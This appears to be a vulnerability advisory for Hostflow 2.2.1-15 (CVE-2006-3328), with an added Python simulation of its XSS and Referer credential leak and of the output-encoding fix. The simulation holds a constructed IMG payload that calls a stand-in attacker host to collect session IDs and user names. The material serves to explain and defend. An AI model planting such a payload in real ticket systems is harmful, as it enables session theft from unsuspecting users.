PT-2006-4221 · Hostflow · Hostflow

Published

2006-06-30

·

Updated

2017-07-20

·

CVE-2006-3328

CVSS v2.0

5.8

Medium

Vector

AV:N/AC:M/Au:N/C:P/I:P/A:N

Name of the Vulnerable Software and Affected Versions

Hostflow version 2.2.1-15
Description

Hostflow 2.2.1-15 allows remote attackers to steal and replay authentication credentials. The cause is either a cross-site scripting (XSS) vulnerability or a leak of credentials through Referer headers: the desc parameter (the Ticket Description field) is reflected into the ticket page without HTML encoding, so an attacker can submit an IMG tag whose src points to a server they control. When anyone views the ticket, their browser fetches that image and sends the URL of the ticket page in the Referer header; if that URL carries the viewer's credentials or session identifier, the attacker's server records them and they can be replayed.

Recommendations

No vendor fix is listed for Hostflow 2.2.1-15. Until one is available, avoid using the desc parameter in new ticket.cgi, and restrict access to new ticket.cgi (for example, to trusted users or networks) to reduce the exposure. Note that the leak is triggered when a ticket is viewed, so descriptions already submitted by untrusted parties carry the same risk.
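The following is an added worked example, written for this entry and not taken from Hostflow, that models the attack the description above outlines and the output-encoding fix the recommendations imply. It assumes a ticket view page that carries the session identifier and user name in its query string (the sid and user parameters, the view_ticket.cgi script name and the attacker.example host are all constructed placeholders), a browser that fetches every IMG it finds and sends the page URL as Referer, and an attacker host that does nothing but log that header. The Referrer-Policy branch is a modern defence-in-depth measure that did not exist in 2006 and is included only to show that encoding the output, not the browser, is what closes the hole.

```python
# Added worked example (not Hostflow code): models the IMG-in-ticket-description
# Referer leak described in this advisory and the output-encoding fix for it.
import html
import re
from urllib.parse import parse_qs, urlsplit

# Simplified stand-in for a browser's HTML parser: finds <img ... src=...> values.
IMG_SRC_RE = re.compile(r'<img\b[^>]*\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.IGNORECASE)


def render_ticket_vulnerable(desc: str) -> str:
    """Echoes the desc parameter into the ticket page unencoded (the flawed pattern)."""
    return f"<html><body><h1>Ticket</h1><p>{desc}</p></body></html>"


def render_ticket_fixed(desc: str) -> str:
    """Same page, but desc is HTML-encoded first so any markup in it renders as text."""
    return f"<html><body><h1>Ticket</h1><p>{html.escape(desc, quote=True)}</p></body></html>"


class AttackerServer:
    """Stands in for the attacker's web host: it only records the Referer headers it receives."""

    def __init__(self) -> None:
        self.referers = []

    def handle_get(self, headers: dict) -> None:
        if "Referer" in headers:
            self.referers.append(headers["Referer"])


def browser_view(page_url: str, page_html: str, attacker: AttackerServer,
                 referrer_policy: str = "unsafe-url") -> list:
    """Simulates a user viewing the ticket page.

    For every <img> found, the browser issues a GET to its src and, unless a
    no-referrer policy is in force, sends the page URL as the Referer header.
    Returns the list of image URLs it fetched.
    """
    fetched = []
    for src in IMG_SRC_RE.findall(page_html):
        headers = {} if referrer_policy == "no-referrer" else {"Referer": page_url}
        attacker.handle_get(headers)  # every src in this demo points at the attacker host
        fetched.append(src)
    return fetched


def credentials_from_referer(referer: str) -> dict:
    """What the attacker can read back if the site carries auth data in the query string."""
    query = parse_qs(urlsplit(referer).query)
    return {k: v[0] for k, v in query.items() if k in ("user", "pass", "sid")}


def run_scenario(render, referrer_policy: str = "unsafe-url") -> list:
    """End to end: attacker files a ticket, a victim views it, attacker reads the log."""
    attacker = AttackerServer()
    # Constructed payload of the kind the advisory describes (attacker.example is a placeholder).
    malicious_desc = 'Printer broken <img src="http://attacker.example/c.gif">'
    # Constructed victim URL: assumes the session id and user name travel in the query string.
    victim_page_url = "http://helpdesk.example/cgi-bin/view_ticket.cgi?sid=deadbeef&user=alice"
    browser_view(victim_page_url, render(malicious_desc), attacker, referrer_policy)
    return [credentials_from_referer(r) for r in attacker.referers]


if __name__ == "__main__":
    print("vulnerable:", run_scenario(render_ticket_vulnerable))                  # leaks sid and user
    print("fixed:     ", run_scenario(render_ticket_fixed))                       # nothing leaks
    print("policy:    ", run_scenario(render_ticket_vulnerable, "no-referrer"))   # defence in depth
```

Running the script shows the vulnerable renderer handing the attacker the victim's sid and user values from a single page view, while the encoded renderer leaves nothing to collect because the submitted tag never becomes an element. The regex is a deliberate simplification of a real HTML parser; the fix does not depend on it, since html.escape neutralises the angle brackets regardless of how the tag is written.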

Fix


Related Identifiers

CVE-2006-3328

Affected Products

Hostflow